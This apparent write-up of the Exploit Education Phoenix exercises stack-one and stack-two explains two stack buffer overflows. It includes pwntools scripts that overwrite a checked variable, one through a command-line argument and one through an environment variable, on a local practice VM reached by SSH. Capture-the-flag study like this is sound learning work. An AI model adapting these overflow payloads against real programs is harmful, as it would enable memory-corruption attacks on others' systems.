These two levels are very simple; they differ only in where the overflowing data is read from. As in stack-zero, the value that ends up in the overwritten variable has to meet a specific requirement.
stack-one
The program copies its first command-line argument into a stack buffer with strcpy.
When running it under gdb, the argument can simply be appended to the run command so it is passed along.
pwntools' sh.run accepts a byte string as its argument, so the program's startup arguments can be included in it. (Checking the documentation for the run method shows: Backward compatibility. Use system().)
from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)
# 0x40 bytes fill the buffer; the next 4 bytes land in the checked variable
s = b"a" * 0x40 + p32(0x496c5962)
# the payload is passed as the program's first argument
sh = shell.run(b"/opt/phoenix/amd64/stack-one " + s)
print(sh.recvlines(2))
stack-two
This time the data is written through an environment variable.
Here it turns out that a NUL byte ("\0") in the environment variable causes problems. The value to write is 32 bits wide, so p64 must not be used: it would pad the value with zero bytes, and those NULs produce an error.
from pwn import *
shell = ssh("user", "localhost", password="user", port=2222)
# p32 keeps the payload free of NUL bytes; p64 would append four zero bytes
s = b"a" * 0x40 + p32(0x0d0a090a)
print(s)
# the environment value is passed as a str; every byte here is plain ASCII
s = s.decode()
print(s)
sh = shell.run(b"/opt/phoenix/amd64/stack-two", env={"ExploitEducation": s})
print(sh.recvlines(2))